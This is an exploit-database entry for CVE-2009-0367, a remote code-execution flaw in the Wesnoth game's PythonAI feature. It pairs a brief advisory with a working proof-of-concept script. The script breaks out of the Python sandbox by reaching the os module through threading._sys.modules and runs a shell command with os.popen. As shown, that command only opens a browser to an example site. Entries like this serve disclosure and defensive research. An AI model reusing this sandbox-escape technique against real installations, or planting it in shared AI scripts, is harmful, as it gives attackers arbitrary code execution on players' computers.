Wesnoth 1.x - PythonAI Remote Code Execution
| EKU-ID: 37727 | CVE: CVE-2009-0367;OSVDB-53877 | OSVDB-ID: |
| Author: Wesnoth | Published: 2009-02-25 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 37727 | CVE: CVE-2009-0367;OSVDB-53877 | OSVDB-ID: |
| Author: Wesnoth | Published: 2009-02-25 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/33971/info
Wesnoth is prone to a remote code-execution vulnerability caused by a design error.
Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.
Versions prior to Wesnoth 1.5.11 are affected.
#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()